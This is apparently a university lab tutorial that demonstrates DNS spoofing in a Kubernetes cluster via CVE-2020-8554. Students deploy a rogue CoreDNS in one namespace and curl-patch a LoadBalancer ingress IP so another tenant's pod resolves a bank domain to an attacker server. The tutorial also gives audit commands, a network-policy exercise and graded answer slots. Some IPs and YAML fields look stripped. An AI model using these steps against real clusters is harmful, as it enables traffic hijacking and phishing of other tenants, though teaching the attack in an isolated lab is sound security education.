DNS spoofing in Kubernetes.

Authors: Mikhail Zolotukhin and Timo Hämäläinen

1. Introduction

As you may have noticed this course heavily relies on virtualization technologies. Virtualization allows one to run multiple machines on a single physical server's CPU. This allows applications to be isolated between VMs and provides a level of security as the information of one application cannot be freely accessed by another application. Thus, virtualization allows for a better utilization of resources in a physical server and better scalability because an application can be added or updated easily. Each VM is a full machine running all the components, including its own operating system, on top of the virtualized hardware. In this tutorial, we will get familiar with Linux containers which is another virtualization method for running multiple isolated Linux systems on a single host. The remainder of this tutorial is organized as follows. Several preliminary tasks are presented in Section 2. Environment configuration is described in Section 3. Attack against a container-orchestration system is presented in Section 4. Assignments are listed in Section 5. Section 6 concludes the tutorial.

This tutorial (including assignments) takes on average 11.62 hours to complete.

2. Preliminary questions:

  • What is Linux container? What are similarities and differences between VMs and containers?
  • What are Kubernetes and microk8s?
  • What are namespace, pod, deployment and service in Kubernetes?
  • Read article "Kubernetes Security 101: Risks and 29 Best Practices". What are in your opinion the most dangerous threats and the most important security practices among the listed ones and why?

3. Network environment

We assume that you have already have configured gateway, attacker, DNS and web servers as described in the previous tutorials. In this section, we will create the following network environment:

  1. Prepare the following VMs: gateway, dnsserv, webserv and kali the attacker. All of them should have network adapters as they have been originally configured:

    • gateway should have 4 adapters: NAT, "lan" (internal), "opt1" (internal) and "opt2" (internal); the 5th adapter of the gateway can be left intact, it should not impact anything
    • dnsserv: "lan" (internal)
    • webserv: "opt1" (internal)
    • kali: "opt2" (internal)

    Start the VMs mentioned. Adjust their netplan settings if needed (see the figure above). In particular, on webserv-VM, revert netplan settings:

    $ sudo nano /etc/netplan/00-installer-config.yaml

    to the original ones:

     version: 2
       dhcp4: no
       addresses: []
        addresses: [,]

    and apply the changes:

    $ sudo netplan apply

    Similarly, on kali-VM, edit network interface settings:

    $ sudo nano /etc/network/interfaces

    so they again look as follows:

    auto eth0
    iface eth0 inet static

    Save, exit, reboot the VM to apply the changes.

  1. To install Kubernetes, we can create a new VM. Alternatively, you can simply use alice-VM. Nevertheless, the resulting VM should have the following properties:

    • Name: kuber
    • RAM: at least 4Gb
    • Hard drive: 50 Gb
    • Network adapters: 1 - lan (internal)

    If you are using alice-VM, make sure it has only one adapter which corresponds to internal subnet "lan". Further in the tutorial, even if you use alice-VM, we will refer to this machine as kuber-VM.

  1. If you have created a new machine for kuber-VM, install Ubuntu Desktop on it, otherwise just go to the next step.
  1. Configure netplan of kuber-VM:

    $ sudo nano /etc/netplan/01-network-manager-all.yaml

    as follows:

     version: 2
       dhcp4: yes

    and apply netplan changes:

    $ sudo netplan apply

    Make sure it does have access to the Internet.

  1. Install microk8s on kuber-VM:

    $ sudo snap install microk8s --classic
  1. Configure firewal on kuber-VM:

    $ sudo ufw allow in on cni0 && sudo ufw allow out on cni0
    $ sudo ufw default allow routed 
  1. Enable Kubernetes addons:

    $ sudo microk8s enable dns dashboard storage 
  1. Retrieve IP of the dashboard. For this purpose, run:

    $ sudo microk8s kubectl get all --all-namespaces

    and then find IP address which corresponds to "service/kubernetes-dashboard".

    It is also worth noticing that the status of the corresponding pod (pod/kubernetes-dashboard-...) should be "Running". If it is not running, you should wait a bit.

  1. Generate a token to access the dashboard:

    $ sudo microk8s kubectl create token default
  1. In the browser on kuber-VM, go to:

    https://<dashboard IP>:443

    where substitute with the IP you obtained earlier. Accept the risk and copy-paste the token generated in the previous step to access the dashboard.

  1. To test the environment, let's create a namespace for Alice. Simply, create a new file "alice.yaml" by running in kuber-VM's terminal:

    $ gedit alice.yaml

    and put there the following lines:

    apiVersion: v1
    kind: Namespace
      name: alice

    Save and exit. After that, run:

    $ sudo microk8s kubectl apply -f alice.yaml
  1. We can now create a new deployment "app" in alice-namespace by creating a new file:

    $ gedit app.yaml

    and put there the following lines:

    apiVersion: apps/v1
    kind: Deployment
      name: app
      namespace: alice
      replicas: 1
          app: echoserver
            app: echoserver
          - image: gcr.io/google_containers/echoserver:1.10
            name: echoserver
            - name: http
              containerPort: 8080
            - name: https
              containerPort: 8443
          dnsPolicy: None  

    Save and exit. After that, run:

    $ sudo microk8s kubectl apply -f app.yaml
  1. To make sure that the deployment has been successfully created, run:

    $ sudo microk8s kubectl get deployments -n alice

    Status READY for app in alice-namespace should be "1/1". Similarly, we can check the pods with the following command:

    $ sudo microk8s kubectl get pods -n alice

    There should be only one pod with status "Running". As you can notice, the name of the pod looks like "app-xxxx-yyyy". Use this name to access the pod from the console:

    $ sudo microk8s kubectl -n alice exec --stdin --tty app-xxxx-yyyy -- /bin/bash

    by substituting app-xxxx-yyyy with the real app's name.

    Alternatively, we can access this pod from the dashboard. In the dashboard, switch to namespace "alice" using the list in the top part of the page, where "default" namespace is currently selected. Navigate to "Pods". Click on the pod corresponding to deployment "app", and then "Exec into pod" in the top right corner.

  1. Inside the pod, run:

    # apt update

    and then install few utilities:

    # apt install net-tools iputils-ping dnsutils w3m -y

    Check that you have access to our bank Oceanic web page:

    # w3m -dump oceanic.ties327.jyu.fi/accounts

    It should work. If it does not, double-check all the configurations.

4. DNS spoofing

In this section, we will perform the DNS spoofing attack to redirect Alice's app to a malicious web page.

  1. First, create "accounts" directory on kali-VM if it does not exist:

    $ sudo mkdir /var/www/html/accounts

    and add file index.php

    $ sudo nano /var/www/html/accounts/index.php

    type there something that will indicate that the server corresponds to the attacker (if it has not been yet done during some of the previous tutorials), e.g.

    You are under attack :(

    save and exit. Start apache service:

    $ sudo systemctl start apache2
  1. Get back to kuber-VM and create a file for namespace "bob":

    $ gedit bob.yaml

    put there the following lines:

    apiVersion: v1
    kind: Namespace
     name: bob

    and then execute in the terminal:

    $ sudo microk8s kubectl apply -f bob.yaml
  1. First, we have to deploy a malicious DNS server in bob-namespace. For this purpose, create a new config-map by editing file:

    $ gedit dns_map.yaml

    as follows:

    apiVersion: v1  
    kind: ConfigMap
      namespace: bob
      name: evil-dns
      Corefile: |
        .:53 {
            file /etc/coredns/ties327.jyu.fi ties327.jyu.fi
            forward .
      ties327.jyu.fi: |
        @            IN      SOA     localhost. root.localhost 2015082541 7200 3600 1209600 3600
        @            IN      NS      localhost.    
        @            IN      A
        @            IN      AAAA    ::1   
        oceanic      IN      A    

    and after that executing:

    $ sudo microk8s kubectl apply -f dns_map.yaml
  1. Make a new evil DNS deployment by editing file:

    $ gedit dns_deploy.yaml

    as follows:

    apiVersion: apps/v1
    kind: Deployment
      name: evil-dns
      namespace: bob
      replicas: 1
          app: evil-dns
            app: evil-dns
          - args:
            -  -conf                                                                                                     
            - /etc/coredns/Corefile
            image: docker.io/coredns/coredns:1.6.0                                                                      
              failureThreshold: 10
                path: /health
                port: 8080
                scheme: HTTP
              periodSeconds: 10
              successThreshold: 1
              timeoutSeconds: 5
            name: coredns
            - containerPort: 53
              name: dns
              protocol: UDP
            - containerPort: 53
              name: dns-tcp
              protocol: TCP
              failureThreshold: 10
                path: /ready
                port: 8181
                scheme: HTTP
              periodSeconds: 10
              successThreshold: 1
              timeoutSeconds: 5
              allowPrivilegeEscalation: false
                - NET_BIND_SERVICE
                - all
              readOnlyRootFilesystem: true
            terminationMessagePath: /dev/termination-log
            terminationMessagePolicy: File
            - mountPath: /etc/coredns
              name: config-volume
          - configMap:
              defaultMode: 420
              - key: Corefile
                path: Corefile
              - key: ties327.jyu.fi
                path: ties327.jyu.fi
              name: evil-dns
            name: config-volume

    and running:

    $ sudo microk8s kubectl apply -f dns_deploy.yaml
  1. The main component of the attack is a load balancer service. Bob can forge this service to have an external IP, e.g. IP of our DNS server. Create file:

    $ gedit lb.yaml

    put there the following lines:

    apiVersion: v1
    kind: Service
      name: evil-lb
      namespace: bob
      - name: dnsu
        port: 53
        targetPort: 53
        protocol: UDP
        app: evil-dns
      type: LoadBalancer

    and execute:

    $ sudo microk8s kubectl apply -f lb.yaml

    Check the status of the service created:

    $ sudo microk8s kubectl get services -n bob

    If you have done everything correct by this point, status of "EXTERNAL-IP" should be <pending>.

  1. Bob needs to patch the service with correct external ingress IP. For this purpose, execute:

    $ sudo microk8s kubectl proxy --port=8080

    and let it run.

  1. Open one more terminal on kuber-VM. First, install curl:

    $ sudo apt install curl

    Next, make the following request to patch status of the load balancer:

    $ curl -k -v -XPATCH  -H "Accept: application/json" -H "Content-Type: application/
    merge-patch+json" '' 
    -d '{"status":{"loadBalancer":{"ingress":[{"ip":""}]}}}'

    Check the status of the service again:

    $ sudo microk8s kubectl get services -n bob

    Now it should be "".

  1. To demonstrate the attack, navigate to the pod corresponding to Alice's app in the terminal or via the dashboard, and execute again:

    # w3m -dump oceanic.ties327.jyu.fi/accounts

    which should return "You are under attack :(" message indicating that the attack has been performed successfully.

5. Assignment

5.1 Preliminary

Complete the test below based on the preliminary questions (1 point).

# kuber_basic1
# kuber_basic2

5.2 Basic

Complete the test below based on the tutorial results (1.0 points):

# kuber_basic3
# kuber_basic4
# kuber_basic5
# kuber_basic6
# kuber_basic7
# kuber_basic8
# kuber_basic9
# kuber_basic10
# kuber_basic11

The attack described in this tutorial relies on the Kubernetes vulnerability CVE-2020-8554. Read more about this vulnerability here and there. In particular, check the commands in the second source that can be used for auditing external IP and load balancer usage:

sudo microk8s kubectl get services --all-namespaces -o=jsonpath='{"NAMESPACE\tNAME\tEXTERNAL 
IPS\n"}{range .items[?(.spec.externalIPs)]}{.metadata.namespace}{"\t"}{.metadata.name}{"\t"}
{.spec.externalIPs}{"\n"}{end}' | column -t -s "$(printf '\t')"
sudo microk8s kubectl get services --all-namespaces -o=jsonpath='{"NAMESPACE\tNAME\tLOAD 
BALANCER IPs\n"}{range .items[?(.status.loadBalancer.ingress[*].ip)]}{.metadata.namespace}
{"\t"}{.metadata.name}{"\t["}{range .status.loadBalancer.ingress[*]}{"\""}{.ip}{"\","}{end}
{"]\n"}{end}' | sed 's/\(.*\),/\1/' |column -t -s "$(printf '\t')"

Answer the questions below devoted to the attack detection and mitigation (0.3 points).

# kuber_basic13
# kuber_basic14

Speaking of network policies, they can be used to allow and deny network traffic from/to the pods. For example, copy this policy to a file:

kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
  name: test-policy
  podSelector: {}
    - Egress
    - to:
      - ipBlock:

and apply it to alice-namespace as follows:

sudo microk8s kubectl -n alice create -f <policy_file>

How does this policy affect the Alice's pod (0.2 points)?

# kuber_basic15

After carrying out the test with the network policy above, delete it as follows, so it does not affect the rest of the assignments:

sudo microk8s kubectl -n alice delete networkpolicy test-policy

In our tutorial, we have configured Alice's pod to use an external DNS ( Check this blogpost which covers the case when the internal Kubernetes DNS is used by the victim instead, and complete the test below (0.5 points).

# kuber_basic12

5.3 Advanced

Another variation of the attack demonstrated in the tutorial relies on employing an external malicious DNS server. For this reason, shut down the dnsserv-VM and make a clone of it. Name the new VM "evil-dnsserv". Start both dnsserv-VMs: the original and the evil one. Edit evil-dnsserv-VM's netplan as follows:

 version: 2
   dhcp4: no
   addresses: []
    addresses: [,]

and apply the settings.

Modify one line in evil-dnsserv-VM's ties327.jyu.fi-zone file:

$ sudo nano /etc/bind/ties327.jyu.fi

so that oceanic.ties327.jyu.fi points to the IP address of kali-VM ( and restart bind9 service of the evil DNS:

$ sudo systemctl restart bind9

On kuber-VM, delete the load balancer service created earlier:

$ sudo microk8s kubectl ...

Modify the load balancer YAML file by removing selector-section and recreate the service by applying the file modified.

$ sudo microk8s kubectl ...

Assuming the proxy on port 8080 started at step 6 of section 4 is still running, patch the service in the same way as previously:

$ curl -k -v -XPATCH  -H "Accept: application/json" -H "Content-Type: application/
merge-patch+json" '' 
-d '{"status":{"loadBalancer":{"ingress":[{"ip":""}]}}}'

and check that external IP in the status of the service is "".

In addition, we have to create an endpoint in bob-namespace. For this purpose, create file "lb_endpoint.yaml" for the endpoint configuration:

$ gedit lb_endpoint.yaml

The endpoint should have the following properties:

  • Name should be "evil-lb"
  • IP address should be equal to the evil-dnsserv-VM's one, i.e.
  • Port and protocol should be 53 and UDP respectively

You can check this "video" how to create such an endpoint.

Create the endpoint by applying the file:

$ sudo microk8s kubectl ...

From Alice's pod, you can now execute:

# nslookup oceanic.ties327.jyu.fi

and, if everything has been done correct, it should return kali-VM's IP address. Similarly, you can run:

# w3m -dump oceanic.ties327.jyu.fi/accounts

and observe our "You are under attack :(" message.

Carry out the experiment described above and copy-paste the commands and configuration lines entered / removed to the corresponding answer boxes below (2 points).

The line in ties327.jyu.fi-zone file (after editting) to point oceanic.ties327.jyu.fi to the IP address of kali-VM (0.25 points):

# kuber_advanced1

The command to delete service "evil-lb" (0.25 points):

# kuber_advanced2

This command works for me?

29 Sep 23

yep, all good; thank you for providing QA in this course :)

29 Sep 23

Also this command works but I don't get points.

30 Oct 23

incorrect answer

31 Oct 23

This command works for me but I don't get any points.

10 Nov 23

Two lines removed from file "lb.yaml" (0.25 points):

# kuber_advanced3

The command to create service "evil-lb" with file "lb.yaml" (0.25 points):

# kuber_advanced4

Content of file "lb_endpoint.yaml" (0.75 points):

# kuber_advanced5

The command to create endpoint "evil-lb" with file "lb_endpoint.yaml" (0.25 points):

# kuber_advanced6

5.4 General comments and feedback

Let us know how many hours in total have you spent on this assignment:

# kuber_time

On a scale from 1 to 10, estimate how interesting and difficult was the tutorial:

# kuber_interest
# kuber_difficulty

You can also give us some general feedback:

# kuber_feedback

6. Conclusion

In this tutorial, we got familiar with another virtualization method called Linux containers. In addition, we demonstrated a DNS spoofing attack in a container-orchestration system.

More information on the topic can be found at:


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